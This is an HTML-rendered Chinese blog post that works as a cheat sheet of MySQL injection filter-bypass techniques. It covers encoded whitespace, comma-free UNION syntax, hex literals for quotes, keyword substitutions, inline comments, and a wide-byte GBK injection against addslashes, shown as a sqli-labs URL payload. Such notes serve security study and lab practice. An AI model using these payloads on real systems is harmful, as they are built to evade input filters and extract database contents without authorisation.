<!DOCTYPE html>
<html lang="cn">

<head>

<!--浏览器搞笑标题-->
<script type="text/javascript" src="\js\FunnyTitle.js"></script>
<!--动态线条背景-->
<script type="text/javascript"
color="220,220,220" opacity='0.7' zIndex="-2" count="200" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js">
</script>


<meta name="generator" content="Hexo 5.4.0"></head>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="This_is_Y">
    
    <title>
        
            mysql绕过技巧 |
        
        This_is_Y
    </title>
    <link rel="stylesheet" href="/css/style.css">
    <link rel="shortcut icon" href="/images/title.jpg">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/css/font-awesome.min.css">
    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"cn","path":"search.xml"};
    KEEP.theme_config = {"toc":{"enable":true,"number":true,"expand_all":false,"init_open":false},"style":{"primary_color":"#33CCCC","avatar":"/images/head.png","favicon":"/images/title.jpg","article_img_align":"left","left_side_width":"260px","content_max_width":"920px","hover":{"shadow":true,"scale":true},"first_screen":{"enable":false,"background_img":"/images/Watch.png","description":"Life is but a Dream"},"scroll":{"progress_bar":{"enable":false},"percent":{"enable":false}}},"local_search":{"enable":true,"trigger":"auto","unescape":false,"preload":true},"code_copy":{"enable":true,"style":"default"},"pjax":{"enable":true},"lazyload":{"enable":false},"version":"3.4.1"};
    KEEP.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
  </script>

</head>



<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <span class="pjax-progress-icon">
            <i class="fas fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            <header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            <a class="logo-title" href="/">
                This_is_Y
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/categories/cnblogs"
                            >
                                CNBLOGS
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/Game"
                            >
                                GAME
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/ReShell"
                            >
                                SHELL
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories/cnblogs">CNBLOGS</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/Game">GAME</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/ReShell">SHELL</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <span class="title-hover-animation">mysql绕过技巧</span>
        </div>

        
            <div class="article-header">
                <div class="avatar">
                    <img src="/images/head.png">
                </div>
                <div class="info">
                    <div class="author">
                        <span class="name">This_is_Y</span>
                        
                            <span class="author-label">Lv6</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fas fa-edit"></i>&nbsp;2021-07-30 16:08:04
    </span>
    
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        <div class="article-content markdown-body">
            <p>参考：<a class="link" target="_blank" rel="noopener" href="https://www.cnblogs.com/yesec/p/12344786.html">https://www.cnblogs.com/yesec/p/12344786.html<i class="fas fa-external-link-alt"></i></a></p>
<h2 id="针对特殊字符限制的绕过"><a href="#针对特殊字符限制的绕过" class="headerlink" title="针对特殊字符限制的绕过"></a>针对特殊字符限制的绕过</h2><h3 id="空格"><a href="#空格" class="headerlink" title="空格"></a>空格</h3><h4 id><a href="#" class="headerlink" title="/**/"></a>/**/</h4><p>SELECT * from emails where id=1<br>SELECT/<strong>/*/</strong>/from/<strong>/emails/</strong>/where/**/id=1</p>
<h4 id="-1"><a href="#-1" class="headerlink" title="()"></a>()</h4><p>括号也可以绕，但不是所有的地方都可以用，<br>select * from emails where(1=1)and(2=2);    √<br>select(*)from()emails()where(1=1)and(2=2);   ×<br>不是很会用</p>
<p>用Tab代替空格%20 %09 %0a %0b %0c %0d %a0 /**/()</p>
<h3 id="逗号-，"><a href="#逗号-，" class="headerlink" title="逗号  ，"></a>逗号  ，</h3><h4 id="使用语法绕过："><a href="#使用语法绕过：" class="headerlink" title="使用语法绕过："></a>使用语法绕过：</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">UNION</span> <span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">FROM</span> ((<span class="keyword">SELECT</span> <span class="number">1</span>)a <span class="keyword">JOIN</span> (<span class="keyword">SELECT</span> <span class="number">2</span>)b <span class="keyword">JOIN</span> (<span class="keyword">SELECT</span> <span class="number">3</span>)c);</span><br><span class="line">实际上也就相当于：</span><br><span class="line"><span class="keyword">UNION</span> <span class="keyword">SELECT</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>;</span><br></pre></td></tr></table></figure>

<h4 id="substr-mid"><a href="#substr-mid" class="headerlink" title="substr/mid"></a>substr/mid</h4><p>绕过方法: from x for y</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">substr(<span class="string">&#x27;password&#x27;</span>, <span class="number">5</span>, <span class="number">1</span>)</span><br><span class="line"><span class="operator">=</span>substr(<span class="string">&#x27;password&#x27;</span> <span class="keyword">from</span> <span class="number">5</span> <span class="keyword">for</span> <span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">mid(<span class="string">&#x27;password&#x27;</span>, <span class="number">5</span>, <span class="number">1</span>)</span><br><span class="line"><span class="operator">=</span>mid(<span class="string">&#x27;password&#x27;</span> <span class="keyword">from</span> <span class="number">5</span> <span class="keyword">for</span> <span class="number">1</span>)</span><br></pre></td></tr></table></figure>



<h3 id="比较符-lt-gt"><a href="#比较符-lt-gt" class="headerlink" title="比较符 &lt; &gt;"></a>比较符 &lt; &gt;</h3><h4 id="greatest函数绕过"><a href="#greatest函数绕过" class="headerlink" title="greatest函数绕过"></a>greatest函数绕过</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">greatest(a,b)，返回a和b中较大的那个数</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>猜解user()第一个字符的ascii码是否小于等于150时<br>ascii(mid(user(),1,1)) &lt;= 150<br>=greatest(ascii(mid(user(),1,1)), 150)=150;</p>
<h4 id="-2"><a href="#-2" class="headerlink" title="=, !="></a>=, !=</h4><p>枚举爆破绕过</p>
<h3 id="等号"><a href="#等号" class="headerlink" title="等号   ="></a>等号   =</h3><pre><code>SELECT mid(USER(),1,1) = &quot;r&quot;
SELECT mid(USER(),1,1) like &quot;r&quot;
SELECT mid(USER(),1,1) in (&quot;r&quot;)
</code></pre>
<h3 id="单引号-‘"><a href="#单引号-‘" class="headerlink" title="单引号  ‘"></a>单引号  ‘</h3><p>在比较的时候过滤了’<br>用hex编码绕过<br>    防护：SELECT mid(USER(),1,1)=’r’<br>    绕过：SELECT mid(USER(),1,1)=unhex(72)</p>
<p>这样子这个只能hex一个字符，多了就不行，所以不建议用这个<br>直接0x就行了<br>    防护：SELECT mid(USER(),1,4)=”root”<br>    绕过：SELECT mid(USER(),1,4)=0x726f6f74</p>
<h3 id="括号-（-）"><a href="#括号-（-）" class="headerlink" title="括号 （  ）"></a>括号 （  ）</h3><h4 id="左括号过滤"><a href="#左括号过滤" class="headerlink" title="左括号过滤"></a>左括号过滤</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">urlencode，ascii(<span class="type">char</span>)，hex，unicode编码绕过</span><br><span class="line"><span class="operator">%</span>u0028 <span class="operator">%</span>uff08</span><br><span class="line"><span class="operator">%</span>c0<span class="operator">%</span><span class="number">28</span> <span class="operator">%</span>c0<span class="operator">%</span>a8</span><br><span class="line"><span class="operator">%</span>e0<span class="operator">%</span><span class="number">80</span><span class="operator">%</span>a8</span><br></pre></td></tr></table></figure>

<h4 id="右括号过滤"><a href="#右括号过滤" class="headerlink" title="右括号过滤"></a>右括号过滤</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">urlencode，ascii(<span class="type">char</span>)，hex，unicode编码绕过</span><br><span class="line"><span class="operator">%</span>u0029 <span class="operator">%</span>uff09</span><br><span class="line"><span class="operator">%</span>c0<span class="operator">%</span><span class="number">29</span> <span class="operator">%</span>c0<span class="operator">%</span>a9</span><br><span class="line"><span class="operator">%</span>e0<span class="operator">%</span><span class="number">80</span><span class="operator">%</span>a9</span><br></pre></td></tr></table></figure>




<h2 id="针对关键字限制的绕过"><a href="#针对关键字限制的绕过" class="headerlink" title="针对关键字限制的绕过"></a>针对关键字限制的绕过</h2><h3 id="or-and"><a href="#or-and" class="headerlink" title="or and"></a>or and</h3><p>对于or 和 and，可以用 || 和  &amp;&amp;</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span> <span class="keyword">or</span> <span class="number">1</span> <span class="operator">=</span> <span class="number">1</span> <span class="number">1</span> <span class="keyword">and</span> <span class="number">1</span> <span class="operator">=</span> <span class="number">1</span></span><br><span class="line"><span class="number">1</span> <span class="operator">||</span> <span class="number">1</span> <span class="operator">=</span> <span class="number">1</span> <span class="number">1</span> <span class="operator">&amp;&amp;</span> a <span class="operator">=</span> <span class="number">1</span></span><br></pre></td></tr></table></figure>

<h3 id="substr"><a href="#substr" class="headerlink" title="substr"></a>substr</h3><p>逻辑绕过</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">过滤代码 <span class="number">1</span> <span class="operator">&amp;&amp;</span> substr(<span class="keyword">user</span>,<span class="number">1</span>,<span class="number">1</span>) <span class="operator">=</span> <span class="built_in">lower</span>(conv(<span class="number">11</span>,<span class="number">10</span>,<span class="number">16</span>))</span><br><span class="line">绕过方式 <span class="number">1</span> <span class="operator">&amp;&amp;</span> lpad(<span class="keyword">user</span>(),<span class="number">1</span>,<span class="number">1</span>) <span class="keyword">in</span> <span class="string">&#x27;r&#x27;</span></span><br></pre></td></tr></table></figure>


<h3 id="hex"><a href="#hex" class="headerlink" title="hex"></a>hex</h3><p>逻辑绕过</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">过滤代码 <span class="number">1</span> <span class="operator">&amp;&amp;</span> substr(<span class="keyword">user</span>,<span class="number">1</span>,<span class="number">1</span>) <span class="operator">=</span> unhex(<span class="number">61</span>)</span><br><span class="line">绕过方式 <span class="number">1</span> <span class="operator">&amp;&amp;</span> substr(<span class="keyword">user</span>,<span class="number">1</span>,<span class="number">1</span>) <span class="operator">=</span> <span class="built_in">lower</span>(conv(<span class="number">11</span>,<span class="number">10</span>,<span class="number">16</span>)) #十进制的<span class="number">11</span>转化为十六进制，并小写。</span><br></pre></td></tr></table></figure>



<h3 id="union-select"><a href="#union-select" class="headerlink" title="union\select"></a>union\select</h3><p>逻辑绕过<br>例：<br>过滤代码 union select user,password from users<br>绕过方式 1 &amp;&amp; (select user from users where userid=1)=’admin’</p>
<p>十六进制字符绕过<br>select ——&gt; selec\x74<br>union——&gt;unio\x6e</p>
<h3 id="where"><a href="#where" class="headerlink" title="where"></a>where</h3><p>逻辑绕过<br>过滤代码 1 &amp;&amp; (select user from users where user_id = 1) = ‘admin’<br>绕过方式 1 &amp;&amp; (select user from users limit 1) = ‘admin’</p>
<h3 id="limit"><a href="#limit" class="headerlink" title="limit"></a>limit</h3><p>逻辑绕过<br>过滤代码 1 &amp;&amp; (select user from users limit 1) = ‘admin’<br>绕过方式 1 &amp;&amp; (select user from users group by user_id having user_id = 1) = ‘admin’#user_id聚合中user_id为1的user为admin</p>
<h3 id="group-by"><a href="#group-by" class="headerlink" title="group by"></a>group by</h3><p>逻辑绕过<br>过滤代码 1 &amp;&amp; (select user from users group by user_id having user_id = 1) = ‘admin’<br>绕过方式 1 &amp;&amp; (select substr(group_concat(user_id),1,1) user from users ) = 1</p>
<h2 id="绕过addslashes"><a href="#绕过addslashes" class="headerlink" title="绕过addslashes"></a>绕过addslashes</h2><p>addslashes函数使用反斜线引用字符串，返回一个字符串，该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号（’）、双引号（”）、反斜线（\）与 NUL（NULL 字符）<br>在mysql使用了gbk编码的情况下，可以用宽字节注入绕过addslashes<br>原理：在使用GBK编码后，他认为两个字节代表一个汉字。那如何判断一个字符是不是中文，当第一个字节ascii码大于128，他就会认为这里两个字符是中文，所以%81和后面的  /（%5c)就会组合在一起，mysql会认为他们是一个字符，而这时候，/ 的转义作用就失效了。<br>128转换16进制是0x80，所以只要大于0x81就行</p>
<p>这里出问题的地方在于mysql，php已经尽职尽责了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1&#x2F;sqli-labs-master&#x2F;Less-33&#x2F;?id&#x3D;-1&#39;union select 1,user(),3--+</span><br><span class="line">127.0.0.1&#x2F;sqli-labs-master&#x2F;Less-33&#x2F;?id&#x3D;-1**%81**&#39;union select 1,user(),3--+</span><br><span class="line">SELECT * FROM users WHERE id&#x3D;&#39;-1�\&#39;union select 1,user(),3</span><br></pre></td></tr></table></figure>


<h2 id="关键字内联绕所有"><a href="#关键字内联绕所有" class="headerlink" title="关键字内联绕所有"></a>关键字内联绕所有</h2><p>/<em>!union</em>/<br>/<em>!select</em>/</p>

        </div>

        

        
            <div class="article-nav">
                
                    <div class="article-prev">
                        <a class="prev"
                           rel="prev"
                           href="/2021/07/31/PCvx%E5%9B%BE%E7%89%87%E8%A7%A3%E5%AF%86/"
                        >
                            <span class="left arrow-icon flex-center">
                              <i class="fas fa-chevron-left"></i>
                            </span>
                            <span class="title flex-center">
                                <span class="post-nav-title-item">PCvx图片解密</span>
                                <span class="post-nav-item">上一篇</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next">
                        <a class="next"
                           rel="next"
                           href="/2021/07/28/C2%E9%9A%90%E8%97%8F/"
                        >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">C2隐藏</span>
                                <span class="post-nav-item">下一篇</span>
                            </span>
                            <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        

        
            <div class="comment-container">
                <div class="comments-container">
    <div id="comment-anchor"></div>
    <div class="comment-area-title">
        <i class="fas fa-comments">&nbsp;评论</i>
    </div>
    

        
            
    <div class="valine-container">
        <script data-pjax
                src="//cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js"></script>
        <div id="vcomments"></div>
        <script data-pjax>
            function loadValine() {
                new Valine({
                    el: '#vcomments',
                    appId: 'pnLUL03RCIjbXBNX6m4sBrtq-gzGzoHsz',
                    appKey: 'itjAi31G55tfhpSKJiuLDe2g',
                    meta: ['nick', 'mail', 'link'],
                    avatar: 'wavatar',
                    enableQQ: true,
                    placeholder: '生命是上天的馈赠，我不想虚度年华',
                    lang: 'cn'.toLowerCase()
                });

                function getAuthor(language) {
                    switch (language) {
                        case 'en':
                            return 'Author';
                        case 'zh-CN':
                            return '博主';
                        default:
                            return 'Master';
                    }
                }

                // Add "Author" identify
                const getValineDomTimer = setInterval(() => {
                    const vcards = document.querySelectorAll('#vcomments .vcards .vcard');
                    if (vcards.length > 0) {
                        let author = 'This_is_Y';

                        if (author) {
                            for (let vcard of vcards) {
                                const vnick_dom = vcard.querySelector('.vhead .vnick');
                                const vnick = vnick_dom.innerHTML;
                                if (vnick === author) {
                                    vnick_dom.innerHTML = `${vnick} <span class="author">${getAuthor(KEEP.hexo_config.language)}</span>`
                                }
                            }
                        }
                        clearInterval(getValineDomTimer);
                    } else {
                        clearInterval(getValineDomTimer);
                    }
                }, 2000);
            }

            if ('true') {
                const loadValineTimeout = setTimeout(() => {
                    loadValine();
                    clearTimeout(loadValineTimeout);
                }, 1000);
            } else {
                window.addEventListener('DOMContentLoaded', loadValine);
            }
        </script>
    </div>



        
    
</div>

            </div>
        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
            2023&nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;<a href="/">This_is_Y</a>
        </div>
        
            <script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    <span id="busuanzi_container_site_uv">
                        访问人数&nbsp;<span id="busuanzi_value_site_uv"></span>&ensp;
                    </span>
                
                
                    <span id="busuanzi_container_site_pv">
                        总访问量&nbsp;<span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="theme-info info-item">
            由 <a target="_blank" href="https://hexo.io">Hexo</a> 驱动&nbsp;|&nbsp;主题&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.4.1</a>
        </div>
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item page-aside-toggle">
                <i class="fas fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="go-comment">
                <i class="fas fa-comment"></i>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-expand-width flex-center">
            <i class="fas fa-arrows-alt-h"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="fas fa-arrow-up"></i>
            </li>
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
    </ul>
</div>

    </div>

    
        <aside class="page-aside">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%92%88%E5%AF%B9%E7%89%B9%E6%AE%8A%E5%AD%97%E7%AC%A6%E9%99%90%E5%88%B6%E7%9A%84%E7%BB%95%E8%BF%87"><span class="nav-number">1.</span> <span class="nav-text">针对特殊字符限制的绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%A9%BA%E6%A0%BC"><span class="nav-number">1.1.</span> <span class="nav-text">空格</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link"><span class="nav-number">1.1.1.</span> <span class="nav-text">&#x2F;**&#x2F;</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#-1"><span class="nav-number">1.1.2.</span> <span class="nav-text">()</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%80%97%E5%8F%B7-%EF%BC%8C"><span class="nav-number">1.2.</span> <span class="nav-text">逗号  ，</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8%E8%AF%AD%E6%B3%95%E7%BB%95%E8%BF%87%EF%BC%9A"><span class="nav-number">1.2.1.</span> <span class="nav-text">使用语法绕过：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#substr-mid"><span class="nav-number">1.2.2.</span> <span class="nav-text">substr&#x2F;mid</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%AF%94%E8%BE%83%E7%AC%A6-lt-gt"><span class="nav-number">1.3.</span> <span class="nav-text">比较符 &lt; &gt;</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#greatest%E5%87%BD%E6%95%B0%E7%BB%95%E8%BF%87"><span class="nav-number">1.3.1.</span> <span class="nav-text">greatest函数绕过</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#-2"><span class="nav-number">1.3.2.</span> <span class="nav-text">&#x3D;, !&#x3D;</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AD%89%E5%8F%B7"><span class="nav-number">1.4.</span> <span class="nav-text">等号   &#x3D;</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8D%95%E5%BC%95%E5%8F%B7-%E2%80%98"><span class="nav-number">1.5.</span> <span class="nav-text">单引号  ‘</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8B%AC%E5%8F%B7-%EF%BC%88-%EF%BC%89"><span class="nav-number">1.6.</span> <span class="nav-text">括号 （  ）</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B7%A6%E6%8B%AC%E5%8F%B7%E8%BF%87%E6%BB%A4"><span class="nav-number">1.6.1.</span> <span class="nav-text">左括号过滤</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%B3%E6%8B%AC%E5%8F%B7%E8%BF%87%E6%BB%A4"><span class="nav-number">1.6.2.</span> <span class="nav-text">右括号过滤</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%92%88%E5%AF%B9%E5%85%B3%E9%94%AE%E5%AD%97%E9%99%90%E5%88%B6%E7%9A%84%E7%BB%95%E8%BF%87"><span class="nav-number">2.</span> <span class="nav-text">针对关键字限制的绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#or-and"><span class="nav-number">2.1.</span> <span class="nav-text">or and</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#substr"><span class="nav-number">2.2.</span> <span class="nav-text">substr</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#hex"><span class="nav-number">2.3.</span> <span class="nav-text">hex</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#union-select"><span class="nav-number">2.4.</span> <span class="nav-text">union\select</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#where"><span class="nav-number">2.5.</span> <span class="nav-text">where</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#limit"><span class="nav-number">2.6.</span> <span class="nav-text">limit</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#group-by"><span class="nav-number">2.7.</span> <span class="nav-text">group by</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%95%E8%BF%87addslashes"><span class="nav-number">3.</span> <span class="nav-text">绕过addslashes</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%85%B3%E9%94%AE%E5%AD%97%E5%86%85%E8%81%94%E7%BB%95%E6%89%80%E6%9C%89"><span class="nav-number">4.</span> <span class="nav-text">关键字内联绕所有</span></a></li></ol>
    </div>
</div>
        </aside>
    

    <div class="image-viewer-container">
    <img src="">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="popup-btn-close">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>



<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/dark-light-toggle.js"></script>


    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/local-search.js"></script>



    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/code-copy.js"></script>




<div class="post-scripts pjax">
    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/left-side-toggle.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/libs/anime.min.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/toc.js"></script>
    
</div>


    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.1/source/js/libs/pjax.min.js"></script>
<script>
    window.addEventListener('DOMContentLoaded', () => {
        const pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd();
            pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            KEEP.refresh();
        });
    });
</script>



</body>
</html>
